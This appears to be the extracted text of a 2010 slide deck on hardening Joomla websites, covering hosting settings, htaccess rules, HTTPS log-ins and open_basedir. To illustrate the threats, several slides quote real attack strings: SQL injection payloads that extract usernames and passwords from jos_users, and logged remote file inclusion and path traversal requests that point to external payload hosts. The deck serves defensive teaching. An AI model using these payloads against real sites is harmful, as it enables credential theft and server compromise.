1. Security talk: Fortifying your Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html

3. Choose the right hosting

4. Choose the right components

5. Inform yourself about good practices ....

6. .... it means:

7. You're right here :) Copyright 2010, Sigsiu.NET GmbH

9. PHP 5

10. MySQL 5

11. htaccess support

12. Safe Mode Off !!!

13. Register Globals Off !!!

14. Access via SFTP

15. HTTPS/SSL support Copyright 2010, Sigsiu.NET GmbH

17. Installing Joomla! Copyright 2010, Sigsiu.NET GmbH

18. Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyright 2010, Sigsiu.NET GmbH

20. User ID of the first super admin is 62 index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,password+FROM+ jos_users +WHERE+ id=62 ... Copyright 2010, Sigsiu.NET GmbH

21. Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH

24. Are ambitious

25. In most cases causing “only” heavy load:

27. htaccess – powerful weapon .htaccess - (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess Copyright 2010, Sigsiu.NET GmbH

28. Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH

29. Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] "GET / /administrator/components/com_remository/admin.remository.php ?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1" 404 95 "Mozilla/5.0" Copyright 2010, Sigsiu.NET GmbH

30. Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 " libwww-perl /5.829 GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1" 403 1029 "Mozilla/3.0 (compatible; Indy Library ) GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1" 403 1029 " Wget /1.1 (compatible; i486; Linux; RedHat7.3) Copyright 2010, Sigsiu.NET GmbH

31. Prevent most common SQL-Injections 2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx &id=1/**/ union /**/ select /**/1, concat (username,0x3a,password)... Copyright 2010, Sigsiu.NET GmbH

33. Disclose as little information as possible

34. Admin Panel Log-In & FTP

35. Who can see it? Copyright 2010, Sigsiu.NET GmbH

37. Use HTTPS for log-in Copyright 2010, Sigsiu.NET GmbH

39. Provider have to offer SSL or SSL-Proxy

40. Invalid SSL-Cert throws error in browser

41. Valid SSL-Certificates are expensive Copyright 2010, Sigsiu.NET GmbH

48. how can a function be dangerous ??

49. Use open_basedir

50. open_basedir = /path/to/www Copyright 2010, Sigsiu.NET GmbH

53. Thank you for your attention! http://www.Sigsiu.NET https://shop.Sigsiu.NET http://joomla.Sigsiu.NET http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html Copyright 2010, Sigsiu.NET GmbH